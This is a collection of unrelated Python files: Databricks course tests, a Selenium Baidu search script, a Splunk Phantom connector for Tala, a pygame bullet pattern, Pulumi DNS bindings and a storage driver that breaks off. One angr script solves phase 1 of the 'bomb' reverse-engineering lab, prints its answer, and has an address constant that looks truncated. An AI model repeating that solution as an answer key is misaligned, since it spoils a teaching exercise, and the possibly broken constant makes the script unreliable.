# MAGIC ## Test `getUsername()`
# COMMAND ----------
def testGetUsername():
username = getUsername()
assert isinstance(username, str)
assert username != ""
return True
functionPassed(testGetUsername())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getUserhome`
# COMMAND ----------
def testGetUserhome():
userhome = getUserhome()
assert isinstance(userhome, str)
assert userhome != ""
assert userhome == "dbfs:/user/" + getUsername()
return True
functionPassed(testGetUserhome())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `assertDbrVersion`
# COMMAND ----------
def testAssertDbrVersion():
(majorVersion, minorVersion) = getDbrMajorAndMinorVersions()
major = int(majorVersion)
minor = int(minorVersion)
goodVersions = [
("PG1", major-1, minor-1),
("PG2", major-1, minor),
("PG3", major, minor-1),
("PG4", major, minor)
]
for (name, testMajor, testMinor) in goodVersions:
print(f"-- {name} {testMajor}.{testMinor}")
assertDbrVersion(None, testMajor, testMinor, False)
print(f"-"*80)
badVersions = [
("PB1", major+1, minor+1),
("PB2", major+1, minor),
("PB3", major, minor+1)
]
for (name, testMajor, testMinor) in badVersions:
try:
print(f"-- {name} {testMajor}.{testMinor}")
assertDbrVersion(None, testMajor, testMinor, False)
raise Exception("Expected AssertionError")
except AssertionError as e:
print(e)
print(f"-"*80)
return True
functionPassed(testAssertDbrVersion())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `assertIsMlRuntime`
# COMMAND ----------
# def testAssertIsMlRuntime():
# assertIsMlRuntime("6.3.x-ml-scala2.11")
# assertIsMlRuntime("6.3.x-cpu-ml-scala2.11")
# try:
# assertIsMlRuntime("5.5.x-scala2.11")
# assert False, "Expected to throw an ValueError"
# except AssertionError:
# pass
# try:
# assertIsMlRuntime("5.5.xml-scala2.11")
# assert False, "Expected to throw an ValueError"
# except AssertionError:
# pass
# return True
# functionPassed(testAssertIsMlRuntime())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test Legacy Functions
# MAGIC
# MAGIC Note: Legacy functions will not be tested. Use at your own risk.
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `createUserDatabase`
# COMMAND ----------
def testCreateUserDatabase():
courseType = "wa"
username = "mickey.mouse@disney.com"
moduleName = "Testing-Stuff 101"
lessonName = "TS 03 - Underwater Basket Weaving"
# Test that correct database name is returned
expectedDatabaseName = "mickey_mouse_disney_com" + "_" + "testing_stuff_101" + "_" + "ts_03_underwater_basket_weaving" + "_" + "p" + "wa"
databaseName = getDatabaseName(courseType, username, moduleName, lessonName)
assert databaseName == expectedDatabaseName, "Expected {}, found {}".format(expectedDatabaseName, databaseName)
actualDatabaseName = createUserDatabase(courseType, username, moduleName, lessonName)
assert actualDatabaseName == expectedDatabaseName, "Expected {}, found {}".format(expectedDatabaseName, databaseName)
assert spark.sql(f"SHOW DATABASES LIKE '{expectedDatabaseName}'").first()["databaseName"] == expectedDatabaseName
assert spark.sql("SELECT current_database()").first()["current_database()"] == expectedDatabaseName
return True
functionPassed(testCreateUserDatabase())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getExperimentId()`
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `classroomCleanup()`
# COMMAND ----------
classroomCleanup(daLogger, "sp", getUsername(), getModuleName(), getLessonName(), False)
# COMMAND ----------
classroomCleanup(daLogger, "il", getUsername(), getModuleName(), getLessonName(), True)
# COMMAND ----------
classroomCleanup(daLogger, "sp", getUsername(), getModuleName(), getLessonName(), False)
# COMMAND ----------
classroomCleanup(daLogger, "il", getUsername(), getModuleName(), getLessonName(), True)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test FILL_IN
# COMMAND ----------
print(FILL_IN)
print(FILL_IN.VALUE)
print(FILL_IN.LIST)
print(FILL_IN.SCHEMA)
print(FILL_IN.ROW)
print(FILL_IN.INT)
print(FILL_IN.DATAFRAME)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `showStudentSurvey()`
# COMMAND ----------
html = renderStudentSurvey()
print(html)
# COMMAND ----------
showStudentSurvey()
# COMMAND ----------
|
from selenium import webdriver
import time
# driver = webdriver.Chrome(executable_path="./chromedriver.exe")#传入路径有两种方式
driver = webdriver.Chrome()#打开浏览器,把chrome放入与python同级目录,括号内不需要添加执行路径。
def openBaiDu(url, selector, keyword,pic):
driver.get(url)
if selector == 'kw':
driver.find_element_by_id(selector).send_keys(keyword)
else:
driver.find_element_by_name(selector).send_keys(keyword)
driver.save_screenshot(pic)#截屏
openBaiDu('https://baidu.com','kw','王力宏','./baidu.png') #绝对路径
time.sleep(3)
driver.quit()#退出diver.close()是关闭tab页
|
# File: tala_connector.py
#
# Copyright (c) 2018-2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
import datetime
import json
import os
import uuid
import phantom.app as phantom
import phantom.rules as ph_rules
# import shutil
import requests
from bs4 import BeautifulSoup
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
from phantom.vault import Vault
# Usage of the consts file is recommended
from tala_consts import *
class RetVal(tuple):
def __new__(cls, val1, val2=None):
return tuple.__new__(RetVal, (val1, val2))
class TalaConnector(BaseConnector):
def __init__(self):
# Call the BaseConnectors init first
super(TalaConnector, self).__init__()
self._state = None
# Variable to hold a base_url in case the app makes REST calls
# Do note that the app json defines the asset config, so please
# modify this as you deem fit.
self._base_url = None
def _process_empty_reponse(self, response, action_result):
if response.status_code == 200:
return RetVal(phantom.APP_SUCCESS, {})
return RetVal(action_result.set_status(phantom.APP_ERROR, "Empty response and no information in the header"), None)
def _process_html_response(self, response, action_result):
# An html response, treat it like an error
status_code = response.status_code
try:
soup = BeautifulSoup(response.text, "html.parser")
# Remove the script, style, footer and navigation part from the HTML message
for element in soup(["script", "style", "footer", "nav"]):
element.extract()
error_text = soup.text
split_lines = error_text.split('\n')
split_lines = [x.strip() for x in split_lines if x.strip()]
error_text = '\n'.join(split_lines)
except Exception:
error_text = "Cannot parse error details"
if 200 <= status_code < 399:
return RetVal(phantom.APP_SUCCESS, json.loads(response.text))
message = "Status Code: {0}. Data from server:\n{1}\n".format(status_code,
error_text)
message = message.replace('{', '{{').replace('}', '}}')
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_json_response(self, r, action_result):
# Try a json parse
try:
resp_json = r.json()
except Exception as e:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Unable to parse JSON response. Error: {0}".format(
str(e))), None)
# Please specify the status codes here
if 200 <= r.status_code < 399:
return RetVal(phantom.APP_SUCCESS, resp_json)
# You should process the error returned in the json
message = "Error from server. Status Code: {0} Data from server: {1}".format(
r.status_code, r.text.replace('{', '{{').replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_response(self, r, action_result):
# store the r_text in debug data, it will get dumped in the logs if the action fails
if hasattr(action_result, 'add_debug_data'):
action_result.add_debug_data({'r_status_code': r.status_code})
action_result.add_debug_data({'r_text': r.text})
action_result.add_debug_data({'r_headers': r.headers})
# Process each 'Content-Type' of response separately
# Process a json response
if 'json' in r.headers.get('Content-Type', ''):
return self._process_json_response(r, action_result)
# Process an HTML resonse, Do this no matter what the api talks.
# There is a high chance of a PROXY in between phantom and the rest of
# world, in case of errors, PROXY's return HTML, this function parses
# the error and adds it to the action_result.
if 'html' in r.headers.get('Content-Type', ''):
return self._process_html_response(r, action_result)
# it's not content-type that is to be parsed, handle an empty response
if not r.text:
return self._process_empty_reponse(r, action_result)
# everything else is actually an error at this point
message = "Can't process response from server. Status Code: {0} Data from server: {1}".format(
r.status_code, r.text.replace('{', '{{').replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _make_rest_call(self, endpoint, action_result, headers=None, params=None, json=None, data=None, method="get"):
config = self.get_config()
resp_json = None
try:
request_func = getattr(requests, method)
except AttributeError:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid method: {0}".format(method)), resp_json)
# Create a URL to connect to
url = self._base_url + endpoint
try:
r = request_func(
url,
json=json,
data=data,
headers=headers,
verify=config.get('verify_server_cert', False),
params=params)
except Exception as e:
return RetVal(action_result.set_status( phantom.APP_ERROR, "Error Connecting to server. Details: {0}".format(
str(e))), resp_json)
return self._process_response(r, action_result)
def _download_file_to_vault(self, action_result, endpoint, json, file_name):
""" Download a file and add it to the vault """
url = self._base_url + endpoint
try:
r = requests.post( # nosemgrep
str(url),
json=json,
headers={ 'Content-Type': 'application/json' }
)
except Exception as e:
return action_result.set_status(phantom.APP_ERROR, "{}".format(str(e)))
if hasattr(Vault, 'get_vault_tmp_dir'):
try:
success, message, new_vault_id = ph_rules.vault_add(
container=self.get_container_id(),
file_location=r.content,
file_name=file_name
)
except Exception as e:
return action_result.set_status(phantom.APP_ERROR, "Could not add file to vault: {0}".format(e))
else:
guid = uuid.uuid4()
tmp_dir = "/vault/tmp/{}".format(guid)
zip_path = "{}/{}".format(tmp_dir, file_name)
try:
os.makedirs(tmp_dir)
except Exception as e:
msg = "Unable to create temporary folder '{}': ".format(tmp_dir)
return action_result.set_status(phantom.APP_ERROR, msg, e)
with open(zip_path, 'wb') as f:
f.write(r.content)
f.close()
vault_path = "{}/{}".format(tmp_dir, file_name)
success, message, new_vault_id = ph_rules.vault_add(
container=self.get_container_id(),
file_location=vault_path,
file_name=file_name
)
if success:
action_result.set_status(phantom.APP_SUCCESS, "Transferred file")
# Check if file with same file name and size is available in vault and save only if it is not available
try:
_, _, data = ph_rules.vault_info(container_id=self.get_container_id(), vault_id=new_vault_id, file_name=file_name)
data = list(data)[0]
file_size = data.get('size')
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Error: failed to find vault ID: {}".format(new_vault_id))
action_result.add_data({
phantom.APP_JSON_VAULT_ID: new_vault_id,
phantom.APP_JSON_NAME: file_name,
phantom.APP_JSON_SIZE: file_size
})
action_result.set_status(phantom.APP_SUCCESS, "Successfully added file to vault")
else:
action_result.set_status(phantom.APP_ERROR, "Error adding file to vault")
return action_result.get_status()
def _handle_test_connectivity(self, param):
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
# NOTE: test connectivity does _NOT_ take any parameters
# i.e. the param dictionary passed to this handler will be empty.
# Also typically it does not add any data into an action_result either.
# The status and progress messages are more important.
headers = { 'auth-token': self._auth_token }
self.save_progress("Connecting to endpoint /project to test connectivity")
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=None, headers=headers)
if phantom.is_fail(ret_val):
self.save_progress("Test Connectivity Failed")
return action_result.get_status()
# Return success
self.save_progress("Test Connectivity Passed")
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_create_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
name = param['name']
url = param['url']
request = {
"auth-token": self._auth_token,
"name": name,
"url": url
}
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['project_id'] = response['id']
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
param = { 'ids': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=param, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data = dict()
for item in response:
data.update(item)
# Get project settings (triggered or manual)
params = { 'id': project_id }
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
# Get status (status and scan id for all projects)
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=headers, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
for item in response:
if int(item['project-id']) == project_id:
data.update(item['latest-scan-status'])
break
# Add the response into the data section
action_result.add_data(data)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_PROJECT_SUCC)
def _handle_list_projects(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data = dict()
for item in response:
data.update({ item['id']: item })
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['num_projects'] = len(response)
# Get project settings (triggered or manual)
for project_id in data:
params = { 'id': int(project_id) }
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data[int(project_id)].update(response)
# Get status (status and scan id for all projects)
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=headers, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
for item in response:
data[int(item['project-id'])].update(item['latest-scan-status'])
# Add the response into the data section
for item in data:
action_result.add_data(data[item])
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_update_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
name = param.get('name', '')
url = param.get('url', '')
automation_mode = param.get('automation_mode')
data = dict()
if name or url:
request = {
"auth-token": self._auth_token,
"id": project_id
}
if name:
request["name"] = name
if url:
request["url"] = url
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, json=request, method='put')
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
if automation_mode:
settings_request = {
'auth-token': self._auth_token,
'automation-mode': automation_mode,
'project-id': project_id
}
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, json=settings_request, method='put')
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
if not name and not url and not automation_mode:
return action_result.set_status(phantom.APP_ERROR, TALA_UPDATE_PROJECT_ERR)
# Add the response into the data section
action_result.add_data(data)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_UPDATE_PROJECT_SUCC)
def _handle_delete_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
params = { 'id': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=params, headers=headers, method='delete')
if phantom.is_fail(ret_val):
message = action_result.get_message()
if 'project not found' in message.lower():
return action_result.set_status(phantom.APP_SUCCESS, TALA_ALREADY_DELETED_PROJECT_SUCC)
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_DELETE_PROJECT_SUCC)
def _handle_create_scan(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_ids = param.get('project_ids', None)
try:
project_ids_list = [int(x) for x in project_ids.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
request = {
"auth-token": self._auth_token,
"projectIDs": project_ids_list
}
# make rest call
ret_val, response = self._make_rest_call('/scan', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
for item in response['scan-initiation-status']:
data = {"project-id": item}
data.update(response['scan-initiation-status'][item])
action_result.add_data(data)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['message'] = response['message']
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_scan_setting(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
params = { 'project-id': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/scan/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_SCAN_SETTINGS_SUCC)
def _handle_get_status(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
request = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
for item in response:
action_result.add_data(item)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['num_projects'] = len(response)
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_summary(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
request = {
'auth-token': self._auth_token,
'projectID': project_id
}
# make rest call
ret_val, response = self._make_rest_call('/scan/summary', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_SUMMARY_SUCC)
def _handle_download_policy_bundle(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_ids']
try:
[int(x) for x in project_id.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
tracking_id = str(param['tracking_id'])
server_conf = param.get('server_conf', None) # If user wants to download everything, provide server_conf
request = {
'auth-token': self._auth_token,
'project': project_id,
'tracking-id': tracking_id
}
file_name = "tala_AIM_bundle_ids{}_{}.zip".format(project_id.replace(',', '-'), tracking_id)
# call /bundle - download AIM policy bundle
ret_val = self._download_file_to_vault(action_result, '/bundle', json=request, file_name=file_name)
if phantom.is_fail(ret_val):
return self.set_status(phantom.APP_ERROR)
if server_conf:
request = {
"auth-token": self._auth_token,
"serverconf": server_conf
}
file_name = "tala_enforcement_module_{}.zip".format(server_conf)
# call /deploy - download web server injection module, template matching library, AIM policy
ret_val = self._download_file_to_vault(action_result, '/deploy', json=request, file_name=file_name)
if phantom.is_fail(ret_val):
return self.set_status(phantom.APP_ERROR)
# Return success status with appropriate message
return self.set_status(phantom.APP_SUCCESS, TALA_DOWNLOAD_POLICY_BUNDLE_SUCC)
def _handle_synchronize_projects(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
scan_id = param['scan_id']
project_ids = param['project_ids']
try:
project_ids_formatted = [int(x) for x in project_ids.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
request = {
"auth-token": self._auth_token,
"projects": [
{
"scan-id": scan_id,
"ts": str(datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
}
],
"projectIDs": project_ids_formatted
}
file_name = "tala_bundle_ids{}_{}.zip".format(project_ids.replace(',', '-'), scan_id)
# make rest call
return self._download_file_to_vault(action_result, '/sync', json=request, file_name=file_name)
def handle_action(self, param):
ret_val = phantom.APP_SUCCESS
# Get the action that we are supposed to execute for this App Run
action_id = self.get_action_identifier()
self.debug_print("action_id", self.get_action_identifier())
if action_id == 'test_connectivity':
ret_val = self._handle_test_connectivity(param)
elif action_id == 'create_project':
ret_val = self._handle_create_project(param)
elif action_id == 'get_project':
ret_val = self._handle_get_project(param)
elif action_id == 'list_projects':
ret_val = self._handle_list_projects(param)
elif action_id == 'update_project':
ret_val = self._handle_update_project(param)
elif action_id == 'delete_project':
ret_val = self._handle_delete_project(param)
elif action_id == 'create_scan':
ret_val = self._handle_create_scan(param)
elif action_id == 'get_scan_setting':
ret_val = self._handle_get_scan_setting(param)
elif action_id == 'get_status':
ret_val = self._handle_get_status(param)
elif action_id == 'get_summary':
ret_val = self._handle_get_summary(param)
elif action_id == 'download_policy_bundle':
ret_val = self._handle_download_policy_bundle(param)
elif action_id == 'synchronize_projects':
ret_val = self._handle_synchronize_projects(param)
return ret_val
def initialize(self):
# Load the state in initialize, use it to store data
# that needs to be accessed across actions
self._state = self.load_state()
# get the asset config
config = self.get_config()
self._base_url = config.get('base_url').rstrip('/')
self._auth_token = config.get('auth_token')
return phantom.APP_SUCCESS
def finalize(self):
# Save the state, this data is saved accross actions and app upgrades
self.save_state(self._state)
return phantom.APP_SUCCESS
if __name__ == '__main__':
import argparse
import sys
import pudb
pudb.set_trace()
argparser = argparse.ArgumentParser()
argparser.add_argument('input_test_json', help='Input Test JSON file')
argparser.add_argument('-u', '--username', help='username', required=False)
argparser.add_argument('-p', '--password', help='password', required=False)
argparser.add_argument('-v', '--verify', action='store_true', help='verify', required=False, default=False)
args = argparser.parse_args()
session_id = None
username = args.username
password = args.password
verify = args.verify
if username is not None and password is None:
# User specified a username but not a password, so ask
import getpass
password = getpass.getpass("Password: ")
if username and password:
try:
login_url = TalaConnector._get_phantom_base_url() + '/login'
print("Accessing the Login page")
r = requests.get(login_url, verify=verify, timeout=60)
csrftoken = r.cookies['csrftoken']
data = dict()
data['username'] = username
data['password'] = password
data['csrfmiddlewaretoken'] = csrftoken
headers = dict()
headers['Cookie'] = 'csrftoken=' + csrftoken
headers['Referer'] = login_url
print("Logging into Platform to get the session id")
r2 = requests.post(login_url, verify=verify, data=data, headers=headers, timeout=60)
session_id = r2.cookies['sessionid']
except Exception as e:
print("Unable to get session id from the platfrom. Error: " + str(e))
sys.exit(1)
with open(args.input_test_json) as f:
in_json = f.read()
in_json = json.loads(in_json)
print(json.dumps(in_json, indent=4))
connector = TalaConnector()
connector.print_progress_message = True
if session_id is not None:
in_json['user_session_token'] = session_id
connector._set_csrf_info(csrftoken, headers['Referer'])
ret_val = connector._handle_action(json.dumps(in_json), None)
print(json.dumps(json.loads(ret_val), indent=4))
sys.exit(0)
|
import angr
BEFORE_STRINGS_NOT_EQUAL_ADDR = 0x8048B2C
FIND_ADDR = 0x8048B43
AVOID_ADDR = 0x8048B3
# Load the binary
proj = angr.Project('bomb', load_options={'auto_load_libs':False})
# Start right before the data comes in:
state = proj.factory.blank_state(addr=BEFORE_STRINGS_NOT_EQUAL_ADDR)
# Approach 1 - create an input string, and put a reference to it in eax.
# a symbolic input string with a length up to 32 bytes
input_string = state.se.BVS("input_string", 8 * 32)
HARDCODED_ADDRESS = 0xd0000010
state.memory.store(HARDCODED_ADDRESS, input_string)
state.regs.eax = HARDCODED_ADDRESS
# Create a path group
path_group = proj.factory.path_group(state)
# Step until the explorer finds one of the addresses we are looking for or all paths are deadended
path_group.explore(find=FIND_ADDR, avoid=AVOID_ADDR)
solution_path = path_group.found[0]
solution_state = solution_path.state
print solution_state.se.any_str(input_string).rstrip(chr(0))
# Prints: 'Public speaking is very easy.'
|
import pygame,sys
import random
import math
from pygame.locals import *
from pygame.sprite import Group
import gF
import Bullet
import Slave
import global_var
import Effect
import Item
def polyByLength(bullets,type,length,sideNum,standardSpeed,standardAngle,pos,color='white',doCode=False,*args):
halfAngle=360/sideNum/2
counterAngle=90-halfAngle
wholeAngle=halfAngle*2
w=standardSpeed/math.sin(math.radians(counterAngle))
sideLength=2*math.tan(halfAngle/180*math.pi)*standardSpeed
for i in range(0,sideNum):
for j in range(0,length):
new_bullet=type(*args)
#print(new_bullet)
unitLength=sideLength/length
dLength=j*unitLength
dFromCenter=dLength-(sideLength/2)
speed=math.sqrt(standardSpeed**2+dFromCenter**2)
sinValue=math.sin(math.radians(counterAngle))*dLength/speed
insideAngle=(math.asin(sinValue)/math.pi*180)
if math.sqrt(w**2+speed**2)<dLength:
insideAngle=180-insideAngle
angle=standardAngle+wholeAngle*i+insideAngle
new_bullet.initial(pos[0],pos[1],1)
if not doCode:
new_bullet.loadColor(color)
else:
new_bullet.doColorCode(color)
new_bullet.setSpeed(angle,speed)
bullets.add(new_bullet)
#print(i,' ',j)
|
from FSMSIM.expr.expr import Expr
class ConcatExpr(Expr):
def __init__(self, l: Expr, r: Expr) -> None:
self.l = l
self.r = r
def evaluate(self) -> str:
return self.l.evaluate() + self.r.evaluate()
def __len__(self) -> int:
return len(self.l) + len(self.r)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class GetManagedZoneResult(object):
"""
A collection of values returned by getManagedZone.
"""
def __init__(__self__, description=None, dns_name=None, name_servers=None, id=None):
if description and not isinstance(description, basestring):
raise TypeError('Expected argument description to be a basestring')
__self__.description = description
"""
A textual description field.
"""
if dns_name and not isinstance(dns_name, basestring):
raise TypeError('Expected argument dns_name to be a basestring')
__self__.dns_name = dns_name
"""
The fully qualified DNS name of this zone, e.g. `terraform.io.`.
"""
if name_servers and not isinstance(name_servers, list):
raise TypeError('Expected argument name_servers to be a list')
__self__.name_servers = name_servers
"""
The list of nameservers that will be authoritative for this
domain. Use NS records to redirect from your DNS provider to these names,
thus making Google Cloud DNS authoritative for this zone.
"""
if id and not isinstance(id, basestring):
raise TypeError('Expected argument id to be a basestring')
__self__.id = id
"""
id is the provider-assigned unique ID for this managed resource.
"""
def get_managed_zone(name=None, project=None):
"""
Provides access to a zone's attributes within Google Cloud DNS.
For more information see
[the official documentation](https://cloud.google.com/dns/zones/)
and
[API](https://cloud.google.com/dns/api/v1/managedZones).
```hcl
data "google_dns_managed_zone" "env_dns_zone" {
name = "qa-zone"
}
resource "google_dns_record_set" "dns" {
name = "my-address.${data.google_dns_managed_zone.env_dns_zone.dns_name}"
type = "TXT"
ttl = 300
managed_zone = "${data.google_dns_managed_zone.env_dns_zone.name}"
rrdatas = ["test"]
}
```
"""
__args__ = dict()
__args__['name'] = name
__args__['project'] = project
__ret__ = pulumi.runtime.invoke('gcp:dns/getManagedZone:getManagedZone', __args__)
return GetManagedZoneResult(
description=__ret__.get('description'),
dns_name=__ret__.get('dnsName'),
name_servers=__ret__.get('nameServers'),
id=__ret__.get('id'))
|
def ping() -> str:
return "pong"
|
import os
import sys
import logging
from pathlib import Path
import importlib
import boto3
from botocore.exceptions import ClientError
import timone
from timone.errors import StorageException
class StorageDriver(object):
def __init__(self):
super()
def object_exists(self, org, repo, oid):
return False
def get_object_upload_url(self, org, repo, oid):
return None
def get_object_download_url(self, org, repo, oid):
return None
def get_object_uri(self, org, repo, oid):
return Path(org) / Path(repo) / oid[:2] / oid[2:4] / oid
def get_object_path(self, org, repo, oid, mkdir=False):
return self.get_object_uri(org, repo, oid)
class StorageDriverFactory(object):
@staticmethod
def get_storage():
# loading the storage system to use
try:
storage = getattr(
importlib.import_module("timone.storage"),
os.getenv("TIMONE_STORAGE", timone.DEFAULT_STORAGE),
)
return storage
except AttributeError as ex:
logging.error(
"Cannot find storage driver: {}.".format(os.getenv("TIMONE_STORAGE"))
)
sys.exit(-1)
class DumbStorageDriver(StorageDriver):
def __init__(self):
super()
# this is purely for testing
self.endpoint = os.getenv("TIMONE_ENDPOINT_URL", timone.DEFAULT_ENDPOINT_URL)
def object_exists(self, org, repo, oid):
logging.debug("org: {} repo: {} object: {}.".format(org, repo, oid))
return True
def get_object_upload_url(self, org, repo, oid):
return "{}/{}/{}/object/{}".format(self.endpoint, org, repo, oid)
def get_object_download_url(self, org, repo, oid):
return "{}/{}/{}/object/{}".format(self.endpoint, org, repo, oid)
class S3StorageDriver(StorageDriver):
def __init__(self):
self.client = boto3.client(
"s3",
endpoint_url=os.getenv("TIMONE_STORAGE_S3_URL"),
